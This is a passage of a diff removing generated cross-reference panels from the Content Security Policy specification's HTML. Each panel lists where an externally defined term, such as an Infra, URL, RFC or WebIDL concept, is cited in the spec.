-    scheme-part matching </a> <a href="#ref-for-ascii-case-insensitive①⓪">(2)</a> <a href="#ref-for-ascii-case-insensitive①①">(3)</a> <a href="#ref-for-ascii-case-insensitive①②">(4)</a> <a href="#ref-for-ascii-case-insensitive①③">(5)</a> <a href="#ref-for-ascii-case-insensitive①④">(6)</a> <a href="#ref-for-ascii-case-insensitive①⑤">(7)</a>
-    <li><a href="#ref-for-ascii-case-insensitive①⑥">6.6.2.8. 
-    host-part matching </a> <a href="#ref-for-ascii-case-insensitive①⑦">(2)</a>
-    <li><a href="#ref-for-ascii-case-insensitive①⑧">6.6.3.1. 
-    Is element nonceable? </a> <a href="#ref-for-ascii-case-insensitive①⑨">(2)</a>
-    <li><a href="#ref-for-ascii-case-insensitive②⓪">6.6.3.2. 
-    Does a source list allow all inline behavior for type? </a>
-    <li><a href="#ref-for-ascii-case-insensitive②①">6.6.3.3. 
-    Does element match source list for type and source? </a> <a href="#ref-for-ascii-case-insensitive②②">(2)</a> <a href="#ref-for-ascii-case-insensitive②③">(3)</a> <a href="#ref-for-ascii-case-insensitive②④">(4)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-ascii-lowercase">
-   <a href="https://infra.spec.whatwg.org/#ascii-lowercase">https://infra.spec.whatwg.org/#ascii-lowercase</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-ascii-lowercase">2.2.1. 
-    Parse a serialized CSP </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-ascii-string">
-   <a href="https://infra.spec.whatwg.org/#ascii-string">https://infra.spec.whatwg.org/#ascii-string</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-ascii-string">2.2. Policies</a> <a href="#ref-for-ascii-string①">(2)</a>
-    <li><a href="#ref-for-ascii-string②">2.3. Directives</a>
-    <li><a href="#ref-for-ascii-string③">2.3.1. Source Lists</a>
-    <li><a href="#ref-for-ascii-string④">6.6.2.7. 
-    scheme-part matching </a> <a href="#ref-for-ascii-string⑤">(2)</a> <a href="#ref-for-ascii-string⑥">(3)</a>
-    <li><a href="#ref-for-ascii-string⑦">6.6.2.8. 
-    host-part matching </a> <a href="#ref-for-ascii-string⑧">(2)</a> <a href="#ref-for-ascii-string⑨">(3)</a>
-    <li><a href="#ref-for-ascii-string①⓪">6.6.2.9. 
-    port-part matching </a> <a href="#ref-for-ascii-string①①">(2)</a>
-    <li><a href="#ref-for-ascii-string①②">6.6.2.10. 
-    path-part matching </a> <a href="#ref-for-ascii-string①③">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-ascii-whitespace">
-   <a href="https://infra.spec.whatwg.org/#ascii-whitespace">https://infra.spec.whatwg.org/#ascii-whitespace</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-ascii-whitespace">2.1. Infrastructure</a>
-    <li><a href="#ref-for-ascii-whitespace①">2.2.1. 
-    Parse a serialized CSP </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-collect-a-sequence-of-code-points">
-   <a href="https://infra.spec.whatwg.org/#collect-a-sequence-of-code-points">https://infra.spec.whatwg.org/#collect-a-sequence-of-code-points</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-collect-a-sequence-of-code-points">2.2.1. 
-    Parse a serialized CSP </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-list-contain">
-   <a href="https://infra.spec.whatwg.org/#list-contain">https://infra.spec.whatwg.org/#list-contain</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-list-contain">2.2. Policies</a>
-    <li><a href="#ref-for-list-contain①">4.2.4. 
-    Should element’s inline type behavior be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-list-contain②">4.3.1. 
-    EnsureCSPDoesNotBlockStringCompilation(callerRealm, calleeRealm, source) </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-iteration-continue">
-   <a href="https://infra.spec.whatwg.org/#iteration-continue">https://infra.spec.whatwg.org/#iteration-continue</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-iteration-continue">2.2.1. 
-    Parse a serialized CSP </a> <a href="#ref-for-iteration-continue①">(2)</a>
-    <li><a href="#ref-for-iteration-continue②">2.2.2. 
-    Parse a serialized CSP list </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-javascript-string-convert">
-   <a href="https://infra.spec.whatwg.org/#javascript-string-convert">https://infra.spec.whatwg.org/#javascript-string-convert</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-javascript-string-convert">6.6.3.3. 
-    Does element match source list for type and source? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-">
-   <a href="https://infra.spec.whatwg.org/#">https://infra.spec.whatwg.org/#</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#termref-for-">2.1. Infrastructure</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-list-is-empty">
-   <a href="https://infra.spec.whatwg.org/#list-is-empty">https://infra.spec.whatwg.org/#list-is-empty</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-list-is-empty">2.3. Directives</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-list">
-   <a href="https://infra.spec.whatwg.org/#list">https://infra.spec.whatwg.org/#list</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-list">2.2. Policies</a>
-    <li><a href="#ref-for-list①">2.2.2. 
-    Parse a serialized CSP list </a> <a href="#ref-for-list②">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-ordered-set">
-   <a href="https://infra.spec.whatwg.org/#ordered-set">https://infra.spec.whatwg.org/#ordered-set</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-ordered-set">2.2. Policies</a>
-    <li><a href="#ref-for-ordered-set①">2.3. Directives</a> <a href="#ref-for-ordered-set②">(2)</a>
-    <li><a href="#ref-for-ordered-set③">2.3.1. Source Lists</a>
-    <li><a href="#ref-for-ordered-set④">6.7.3. 
-    Get fetch directive fallback list </a> <a href="#ref-for-ordered-set⑤">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-ordered-set">
-   <a href="https://infra.spec.whatwg.org/#ordered-set">https://infra.spec.whatwg.org/#ordered-set</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-ordered-set">2.2. Policies</a>
-    <li><a href="#ref-for-ordered-set①">2.3. Directives</a> <a href="#ref-for-ordered-set②">(2)</a>
-    <li><a href="#ref-for-ordered-set③">2.3.1. Source Lists</a>
-    <li><a href="#ref-for-ordered-set④">6.7.3. 
-    Get fetch directive fallback list </a> <a href="#ref-for-ordered-set⑤">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-split-on-ascii-whitespace">
-   <a href="https://infra.spec.whatwg.org/#split-on-ascii-whitespace">https://infra.spec.whatwg.org/#split-on-ascii-whitespace</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-split-on-ascii-whitespace">2.2.1. 
-    Parse a serialized CSP </a>
-    <li><a href="#ref-for-split-on-ascii-whitespace①">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-split-on-commas">
-   <a href="https://infra.spec.whatwg.org/#split-on-commas">https://infra.spec.whatwg.org/#split-on-commas</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-split-on-commas">2.2.2. 
-    Parse a serialized CSP list </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-strictly-split">
-   <a href="https://infra.spec.whatwg.org/#strictly-split">https://infra.spec.whatwg.org/#strictly-split</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-strictly-split">2.2.1. 
-    Parse a serialized CSP </a>
-    <li><a href="#ref-for-strictly-split①">6.6.2.10. 
-    path-part matching </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-string">
-   <a href="https://infra.spec.whatwg.org/#string">https://infra.spec.whatwg.org/#string</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-string">2.3. Directives</a> <a href="#ref-for-string①">(2)</a>
-    <li><a href="#ref-for-string②">2.3.1. Source Lists</a> <a href="#ref-for-string③">(2)</a>
-    <li><a href="#ref-for-string④">2.4.1. 
-    Create a violation object for global, policy, and directive </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-strip-leading-and-trailing-ascii-whitespace">
-   <a href="https://infra.spec.whatwg.org/#strip-leading-and-trailing-ascii-whitespace">https://infra.spec.whatwg.org/#strip-leading-and-trailing-ascii-whitespace</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-strip-leading-and-trailing-ascii-whitespace">2.2.1. 
-    Parse a serialized CSP </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-valid-mime-type">
-   <a href="https://mimesniff.spec.whatwg.org/#valid-mime-type">https://mimesniff.spec.whatwg.org/#valid-mime-type</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-valid-mime-type">6.2.2. plugin-types</a>
-    <li><a href="#ref-for-valid-mime-type①">6.2.2.2. 
-    Should plugin element be blocked a priori by Content
-    Security Policy?: </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-group">
-   <a href="https://w3c.github.io/reporting/#group">https://w3c.github.io/reporting/#group</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-group">6.4.2. report-to</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-queue-report">
-   <a href="https://w3c.github.io/reporting/#queue-report">https://w3c.github.io/reporting/#queue-report</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-queue-report">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-section-5.1">
-   <a href="https://tools.ietf.org/html/rfc2045#section-5.1">https://tools.ietf.org/html/rfc2045#section-5.1</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-section-5.1">6.2.2. plugin-types</a> <a href="#ref-for-section-5.1①">(2)</a> <a href="#ref-for-section-5.1②">(3)</a> <a href="#ref-for-section-5.1③">(4)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-section-5.1">
-   <a href="https://tools.ietf.org/html/rfc2045#section-5.1">https://tools.ietf.org/html/rfc2045#section-5.1</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-section-5.1">6.2.2. plugin-types</a> <a href="#ref-for-section-5.1①">(2)</a> <a href="#ref-for-section-5.1②">(3)</a> <a href="#ref-for-section-5.1③">(4)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-section-3.2.2">
-   <a href="https://tools.ietf.org/html/rfc3986#section-3.2.2">https://tools.ietf.org/html/rfc3986#section-3.2.2</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-section-3.2.2">6.6.2.8. 
-    host-part matching </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-section-3.3">
-   <a href="https://tools.ietf.org/html/rfc3986#section-3.3">https://tools.ietf.org/html/rfc3986#section-3.3</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-section-3.3">2.3.1. Source Lists</a> <a href="#ref-for-section-3.3①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-section-3.1">
-   <a href="https://tools.ietf.org/html/rfc3986#section-3.1">https://tools.ietf.org/html/rfc3986#section-3.1</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-section-3.1">2.3.1. Source Lists</a> <a href="#ref-for-section-3.1①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-section-4.1">
-   <a href="https://tools.ietf.org/html/rfc3986#section-4.1">https://tools.ietf.org/html/rfc3986#section-4.1</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-section-4.1">6.4.1. report-uri</a> <a href="#ref-for-section-4.1①">(2)</a> <a href="#ref-for-section-4.1②">(3)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-section-4">
-   <a href="https://tools.ietf.org/html/rfc4648#section-4">https://tools.ietf.org/html/rfc4648#section-4</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-section-4">2.3.1. Source Lists</a>
-    <li><a href="#ref-for-section-4①">6.6.3.3. 
-    Does element match source list for type and source? </a> <a href="#ref-for-section-4②">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-section-5">
-   <a href="https://tools.ietf.org/html/rfc4648#section-5">https://tools.ietf.org/html/rfc4648#section-5</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-section-5">2.3.1. Source Lists</a>
-    <li><a href="#ref-for-section-5①">6.6.3.3. 
-    Does element match source list for type and source? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-appendix-B.1">
-   <a href="https://tools.ietf.org/html/rfc5234#appendix-B.1">https://tools.ietf.org/html/rfc5234#appendix-B.1</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-appendix-B.1">2.3. Directives</a> <a href="#ref-for-appendix-B.1①">(2)</a> <a href="#ref-for-appendix-B.1②">(3)</a> <a href="#ref-for-appendix-B.1③">(4)</a> <a href="#ref-for-appendix-B.1④">(5)</a> <a href="#ref-for-appendix-B.1⑤">(6)</a> <a href="#ref-for-appendix-B.1⑥">(7)</a>
-    <li><a href="#ref-for-appendix-B.1⑦">2.3.1. Source Lists</a> <a href="#ref-for-appendix-B.1⑧">(2)</a> <a href="#ref-for-appendix-B.1⑨">(3)</a> <a href="#ref-for-appendix-B.1①⓪">(4)</a> <a href="#ref-for-appendix-B.1①①">(5)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-appendix-B.1">
-   <a href="https://tools.ietf.org/html/rfc5234#appendix-B.1">https://tools.ietf.org/html/rfc5234#appendix-B.1</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-appendix-B.1">2.3. Directives</a> <a href="#ref-for-appendix-B.1①">(2)</a> <a href="#ref-for-appendix-B.1②">(3)</a> <a href="#ref-for-appendix-B.1③">(4)</a> <a href="#ref-for-appendix-B.1④">(5)</a> <a href="#ref-for-appendix-B.1⑤">(6)</a> <a href="#ref-for-appendix-B.1⑥">(7)</a>
-    <li><a href="#ref-for-appendix-B.1⑦">2.3.1. Source Lists</a> <a href="#ref-for-appendix-B.1⑧">(2)</a> <a href="#ref-for-appendix-B.1⑨">(3)</a> <a href="#ref-for-appendix-B.1①⓪">(4)</a> <a href="#ref-for-appendix-B.1①①">(5)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-appendix-B.1">
-   <a href="https://tools.ietf.org/html/rfc5234#appendix-B.1">https://tools.ietf.org/html/rfc5234#appendix-B.1</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-appendix-B.1">2.3. Directives</a> <a href="#ref-for-appendix-B.1①">(2)</a> <a href="#ref-for-appendix-B.1②">(3)</a> <a href="#ref-for-appendix-B.1③">(4)</a> <a href="#ref-for-appendix-B.1④">(5)</a> <a href="#ref-for-appendix-B.1⑤">(6)</a> <a href="#ref-for-appendix-B.1⑥">(7)</a>
-    <li><a href="#ref-for-appendix-B.1⑦">2.3.1. Source Lists</a> <a href="#ref-for-appendix-B.1⑧">(2)</a> <a href="#ref-for-appendix-B.1⑨">(3)</a> <a href="#ref-for-appendix-B.1①⓪">(4)</a> <a href="#ref-for-appendix-B.1①①">(5)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-section-3.2.3">
-   <a href="https://tools.ietf.org/html/rfc7230#section-3.2.3">https://tools.ietf.org/html/rfc7230#section-3.2.3</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-section-3.2.3">2.1. Infrastructure</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-section-3.2.6">
-   <a href="https://tools.ietf.org/html/rfc7230#section-3.2.6">https://tools.ietf.org/html/rfc7230#section-3.2.6</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-section-3.2.6">6.2.3. sandbox</a> <a href="#ref-for-section-3.2.6①">(2)</a>
-    <li><a href="#ref-for-section-3.2.6②">6.4.2. report-to</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-section-3">
-   <a href="https://tools.ietf.org/html/rfc7231#section-3">https://tools.ietf.org/html/rfc7231#section-3</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-section-3">3. 
-    Policy Delivery </a>
-    <li><a href="#ref-for-section-3①">3.1. 
-    The Content-Security-Policy HTTP Response Header Field </a> <a href="#ref-for-section-3②">(2)</a>
-    <li><a href="#ref-for-section-3③">3.2. 
-    The Content-Security-Policy-Report-Only HTTP Response Header Field </a> <a href="#ref-for-section-3④">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-section-3">
-   <a href="https://tools.ietf.org/html/rfc7231#section-3">https://tools.ietf.org/html/rfc7231#section-3</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-section-3">3. 
-    Policy Delivery </a>
-    <li><a href="#ref-for-section-3①">3.1. 
-    The Content-Security-Policy HTTP Response Header Field </a> <a href="#ref-for-section-3②">(2)</a>
-    <li><a href="#ref-for-section-3③">3.2. 
-    The Content-Security-Policy-Report-Only HTTP Response Header Field </a> <a href="#ref-for-section-3④">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-serviceworker">
-   <a href="https://w3c.github.io/ServiceWorker/#serviceworker">https://w3c.github.io/ServiceWorker/#serviceworker</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-serviceworker">6.1.1. child-src</a>
-    <li><a href="#ref-for-serviceworker①">6.1.17. worker-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-serviceworkerglobalscope">
-   <a href="https://w3c.github.io/ServiceWorker/#serviceworkerglobalscope">https://w3c.github.io/ServiceWorker/#serviceworkerglobalscope</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-serviceworkerglobalscope">4.2.2. 
-    Initialize a global object’s CSP list </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-">
-   <a href="https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#">https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#termref-for-">6.6.3.3. 
-    Does element match source list for type and source? </a> <a href="#termref-for-">(2)</a> <a href="#termref-for-">(3)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-">
-   <a href="https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#">https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#termref-for-">6.6.3.3. 
-    Does element match source list for type and source? </a> <a href="#termref-for-">(2)</a> <a href="#termref-for-">(3)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-">
-   <a href="https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#">https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#termref-for-">6.6.3.3. 
-    Does element match source list for type and source? </a> <a href="#termref-for-">(2)</a> <a href="#termref-for-">(3)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-url">
-   <a href="https://url.spec.whatwg.org/#url">https://url.spec.whatwg.org/#url</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-url">2.4. Violations</a> <a href="#ref-for-url①">(2)</a> <a href="#ref-for-url②">(3)</a> <a href="#ref-for-url③">(4)</a>
-    <li><a href="#ref-for-url④">6.2.1. base-uri</a>
-    <li><a href="#ref-for-url⑤">6.2.1.1. 
-    Is base allowed for document? </a>
-    <li><a href="#ref-for-url⑥">6.3.1. form-action</a>
-    <li><a href="#ref-for-url⑦">6.3.2. frame-ancestors</a>
-    <li><a href="#ref-for-url⑧">6.3.3. navigate-to</a>
-    <li><a href="#ref-for-url⑨">6.6.2.5. 
-    Does url match source list in origin with redirect count? </a>
-    <li><a href="#ref-for-url①⓪">6.6.2.6. 
-    Does url match expression in origin with redirect count? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-base-url">
-   <a href="https://url.spec.whatwg.org/#concept-base-url">https://url.spec.whatwg.org/#concept-base-url</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-base-url">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-default-port">
-   <a href="https://url.spec.whatwg.org/#default-port">https://url.spec.whatwg.org/#default-port</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-default-port">6.6.2.6. 
-    Does url match expression in origin with redirect count? </a>
-    <li><a href="#ref-for-default-port①">6.6.2.9. 
-    port-part matching </a> <a href="#ref-for-default-port②">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-url-host">
-   <a href="https://url.spec.whatwg.org/#concept-url-host">https://url.spec.whatwg.org/#concept-url-host</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-url-host">6.6.2.8. 
-    host-part matching </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-ipv6">
-   <a href="https://url.spec.whatwg.org/#concept-ipv6">https://url.spec.whatwg.org/#concept-ipv6</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-ipv6">6.6.2.8. 
-    host-part matching </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-url-origin">
-   <a href="https://url.spec.whatwg.org/#concept-url-origin">https://url.spec.whatwg.org/#concept-url-origin</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-url-origin">4.1.1. 
-    Set response’s CSP list </a>
-    <li><a href="#ref-for-concept-url-origin①">6.6.2.6. 
-    Does url match expression in origin with redirect count? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-url-path">
-   <a href="https://url.spec.whatwg.org/#concept-url-path">https://url.spec.whatwg.org/#concept-url-path</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-url-path">6.6.2.6. 
-    Does url match expression in origin with redirect count? </a>
-    <li><a href="#ref-for-concept-url-path①">6.6.2.10. 
-    path-part matching </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-percent-decode">
-   <a href="https://url.spec.whatwg.org/#percent-decode">https://url.spec.whatwg.org/#percent-decode</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-percent-decode">6.6.2.10. 
-    path-part matching </a> <a href="#ref-for-percent-decode①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-url-port">
-   <a href="https://url.spec.whatwg.org/#concept-url-port">https://url.spec.whatwg.org/#concept-url-port</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-url-port">6.6.2.6. 
-    Does url match expression in origin with redirect count? </a>
-    <li><a href="#ref-for-concept-url-port①">6.6.2.9. 
-    port-part matching </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-url-scheme">
-   <a href="https://url.spec.whatwg.org/#concept-url-scheme">https://url.spec.whatwg.org/#concept-url-scheme</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-url-scheme">4.2.1. 
-    Initialize a Document's CSP list </a>
-    <li><a href="#ref-for-concept-url-scheme①">4.2.2. 
-    Initialize a global object’s CSP list </a>
-    <li><a href="#ref-for-concept-url-scheme②">4.2.5. 
-    Should navigation request of type from source in target be blocked
-    by Content Security Policy? </a>
-    <li><a href="#ref-for-concept-url-scheme③">6.6.2.6. 
-    Does url match expression in origin with redirect count? </a> <a href="#ref-for-concept-url-scheme④">(2)</a> <a href="#ref-for-concept-url-scheme⑤">(3)</a> <a href="#ref-for-concept-url-scheme⑥">(4)</a> <a href="#ref-for-concept-url-scheme⑦">(5)</a> <a href="#ref-for-concept-url-scheme⑧">(6)</a> <a href="#ref-for-concept-url-scheme⑨">(7)</a> <a href="#ref-for-concept-url-scheme①⓪">(8)</a> <a href="#ref-for-concept-url-scheme①①">(9)</a>
-    <li><a href="#ref-for-concept-url-scheme①②">6.6.2.7. 
-    scheme-part matching </a>
-    <li><a href="#ref-for-concept-url-scheme①③">6.6.2.9. 
-    port-part matching </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-url-parser">
-   <a href="https://url.spec.whatwg.org/#concept-url-parser">https://url.spec.whatwg.org/#concept-url-parser</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-url-parser">5.3. 
-    Report a violation </a>
-    <li><a href="#ref-for-concept-url-parser①">6.3.2.1. 
-    frame-ancestors Navigation Response Check </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-url-serializer">
-   <a href="https://url.spec.whatwg.org/#concept-url-serializer">https://url.spec.whatwg.org/#concept-url-serializer</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-url-serializer">5.2. 
-    Obtain the deprecated serialization of violation </a> <a href="#ref-for-concept-url-serializer①">(2)</a> <a href="#ref-for-concept-url-serializer②">(3)</a> <a href="#ref-for-concept-url-serializer③">(4)</a>
-    <li><a href="#ref-for-concept-url-serializer④">5.3. 
-    Report a violation </a> <a href="#ref-for-concept-url-serializer⑤">(2)</a> <a href="#ref-for-concept-url-serializer⑥">(3)</a> <a href="#ref-for-concept-url-serializer⑦">(4)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-idl-DOMString">
-   <a href="https://heycam.github.io/webidl/#idl-DOMString">https://heycam.github.io/webidl/#idl-DOMString</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-idl-DOMString">5.1. 
-    Violation DOM Events </a> <a href="#ref-for-idl-DOMString①">(2)</a> <a href="#ref-for-idl-DOMString②">(3)</a> <a href="#ref-for-idl-DOMString③">(4)</a> <a href="#ref-for-idl-DOMString④">(5)</a> <a href="#ref-for-idl-DOMString⑤">(6)</a> <a href="#ref-for-idl-DOMString⑥">(7)</a> <a href="#ref-for-idl-DOMString⑦">(8)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-Exposed">
-   <a href="https://heycam.github.io/webidl/#Exposed">https://heycam.github.io/webidl/#Exposed</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-Exposed">5.1. 
-    Violation DOM Events </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-idl-USVString">
-   <a href="https://heycam.github.io/webidl/#idl-USVString">https://heycam.github.io/webidl/#idl-USVString</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-idl-USVString">5.1. 
-    Violation DOM Events </a> <a href="#ref-for-idl-USVString①">(2)</a> <a href="#ref-for-idl-USVString②">(3)</a> <a href="#ref-for-idl-USVString③">(4)</a> <a href="#ref-for-idl-USVString④">(5)</a> <a href="#ref-for-idl-USVString⑤">(6)</a> <a href="#ref-for-idl-USVString⑥">(7)</a> <a href="#ref-for-idl-USVString⑦">(8)</a> <a href="#ref-for-idl-USVString⑧">(9)</a> <a href="#ref-for-idl-USVString⑨">(10)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-idl-unsigned-long">
-   <a href="https://heycam.github.io/webidl/#idl-unsigned-long">https://heycam.github.io/webidl/#idl-unsigned-long</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-idl-unsigned-long">5.1. 
-    Violation DOM Events </a> <a href="#ref-for-idl-unsigned-long①">(2)</a> <a href="#ref-for-idl-unsigned-long②">(3)</a> <a href="#ref-for-idl-unsigned-long③">(4)</a> <a href="#ref-for-idl-unsigned-long④">(5)</a> <a href="#ref-for-idl-unsigned-long⑤">(6)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-idl-unsigned-short">
-   <a href="https://heycam.github.io/webidl/#idl-unsigned-short">https://heycam.github.io/webidl/#idl-unsigned-short</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-idl-unsigned-short">5.1. 
-    Violation DOM Events </a> <a href="#ref-for-idl-unsigned-short①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-workletglobalscope">
-   <a href="https://drafts.css-houdini.org/worklets/#workletglobalscope">https://drafts.css-houdini.org/worklets/#workletglobalscope</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-workletglobalscope">2.2. Policies</a>
-    <li><a href="#ref-for-workletglobalscope①">4.2. 
-    Integration with HTML </a> <a href="#ref-for-workletglobalscope②">(2)</a>
-    <li><a href="#ref-for-workletglobalscope③">4.2.2. 
-    Initialize a global object’s CSP list </a>
-    <li><a href="#ref-for-workletglobalscope④">4.2.3. 
-    Retrieve the CSP list of an object </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-workletglobalscope-owner-document">
